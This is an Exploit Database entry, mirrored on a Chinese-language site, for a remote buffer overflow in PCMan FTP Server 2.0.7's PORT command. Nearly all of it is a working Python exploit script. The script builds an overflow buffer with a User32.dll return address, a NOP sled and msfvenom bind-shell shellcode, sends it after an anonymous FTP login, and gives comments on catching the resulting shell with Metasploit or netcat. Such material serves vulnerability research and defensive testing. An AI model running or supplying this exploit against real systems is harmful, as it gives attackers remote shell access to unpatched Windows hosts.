PCMan FTP Server 2.0.7 – ‘PORT’ Remote Buffer Overflow

• Exploit Database
• 75 阅读

• 作者： Pablo González
  日期： 2016-11-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40714/

• #!/usr/bin/env python
  #-*- coding: utf-8 -*-
  
  # Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
  # Author: Pablo González
  # Date: 4/11/2016
  # Software: PCMan 2.0
  # Tested on: Windows XP Profesional SP3 Spanish x86
  
  import socket
  
  print "Creating malicious input!"
  
  junk = '\x41'*2007
  ret="\xf7\x56\x3c\x7e"	#User32.dll 7E3C56F7
  nops = '\x90'*20
  
  #msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
  #put shellcode in variable 'sc'
  
  sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
  "\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
  "\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
  "\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
  "\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
  "\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
  "\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
  "\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
  "\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
  "\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
  "\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
  "\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
  "\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
  "\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
  "\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
  "\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
  "\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
  "\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
  "\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
  "\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
  "\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
  "\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
  "\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
  "\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
  
  buffer= junk + ret + nops + sc
  
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  ip = raw_input('Give me Remote IP Address:')
  connect=s.connect((ip,21))
  banner = s.recv(1024)
  print banner
  s.send('USER anonymous\r\n')
  s.recv(1024)
  s.send('PASS\r\n')
  s.recv(1024)
  #Sending input PORT command (Exploitation is coming)
  s.send('PORT' + buffer + '\r\n')
  s.close()
  
  #Metasploit exploit/multi/handler or nc <ip> <port> :D
  #
  # For exploit/multi/handler
  #
  # use exploit/multi/handler
  # set PAYLOAD windows/shell_bind_tcp
  # set RHOST <ip>
  # set LPORT 1144
  # exploit
  # ...
  # Got it!
  
  print "Got it? :D"
  

  PowerShell

  Copy